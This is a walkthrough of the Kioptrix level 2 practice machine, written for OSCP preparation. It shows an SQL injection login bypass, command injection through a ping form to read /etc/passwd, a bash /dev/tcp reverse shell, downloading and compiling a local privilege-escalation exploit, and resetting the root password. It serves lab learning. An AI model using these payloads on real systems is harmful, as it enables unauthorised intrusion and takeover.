It’s time for level 2 . This write-up is for those who’re preparing for the OSCP exam , and to improve my documentation skills along the way . Follow along.
Machine link : Kioptrix level 2
My Methodology : (IP address — Service Enumeration — Web server enumeration — SQLi — Command injection — Reverse shell — Privilege escalation)
after installing the machine in your VMware , I want to know the IP address of it , So i used netdiscover command which built-in kali to know the live hosts on my network
another method to know the live hosts , i used my bash script using nmap to grep the live IPs
#!/bin/bashnmap -sP 192.168.1.1/24 | grep "for" | cut -d " " -f 5
I will use nmap tool to enumerate the ports/services , so i will use the following command
sudo nmap -sV 192.168.1.3 -o scan
- sV: Probe open ports to determine service/version info
- -o : save the output in file
service’s version : OpenSSH 3.9p1
I used searchsploit to search for public vulnerabilities to this version and i found nothing about it.
Web service enumeration
Service’s version on port 80 : Apache httpd 2.0.52 ((centos)) , i will use nikto to get more information
Unfortunaltely i found nothing on port 443 to scan
Port 80 is where all the actions lies
I will do directory fuzzing using dirsearch by using the following command
dirsearch -u http://192.168.1.3 --full-url --exclude-status=404,403,401,500
— exclude-status : Exclude status codes, separated by commas, support
ranges (Example: 301,500–599)
So , i will navigate to http://192.168.1.3 in my browser and i found remote system administration login page
I clicked on view page source to see if anything interesting and i found that the user is administrator
first thing i will try sqli in the username and i will balance the query to exploit this vulnerability
I entered this balance query in username without any password and it succeeded
administrator’ or 1=1 — -
So i found that next page had ping function which required you to give it an IP to ping it , so i entered 127.0.0.1 and it pinged to the ip with 3 times maybe the command used -c 3 , let’s try to get command injection
i will concatenate with the ip command to execute both of them using ;
Command injection leads to LFI
So i can try to read /etc/passwd to see all the users exists in the system using the following command ;cat /etc/passwd
So i found that there were 2 users (john — harold)
i was trying to get the private key of them to connect ssh but i didn’t have the permission to do this
Command injection leads to RCE
I will use netcat to get reverse shell using pentestermonkey and i inject the following command ;bash -i >& /dev/tcp/192.168.1.6/4444 0>&1
The best way to check Redhat version is using cat /etc/os-release command. All we need is to open the terminal and type cat /etc/os-release. It will list the Redhat OS distribution name and release version information. so i write the following command cat /etc/redhat-release
I will searchsploit about Centos 4.5 to know if this version has privilege escalation public vulnerability or not
searchsploit centos 4.5
So , i want to upload this exploit 9542.c to the machine to try it to get root access .
searchsploit -p 9542.c -> to know the path of this exploit
sudo cp PATH . -> to copy the exploit to my current directory
python3 -m http.server -> to deploy a web server
then go to the machine and navigate to /tmp to download the exploit
After downloading the exploit , compile it and execute using the following command gcc 9542.c -o 9542
I navigated to /var/www/html to see the source code of index.php which has the database queries
I found that the database name was webapp , then username = john & password = Hiroshima, i will try to connect with these creds on mysql using the following command
mysql -u john -h localhost -p hiroshima
In our machine the used database called webapp , so try to dump all the users exists in the database.
Changing password to connect to the original machine (kioptrix 2)
Changing password for user root.
New UNIX password: rootBAD PASSWORD: it is too short
Retype new UNIX password: rootpasswd: all authentication tokens updated successfully.
then i connect to kioptrix 2 with username = root & new password = root
Congratulations, Machine hacked done.
Contact : LinkedIn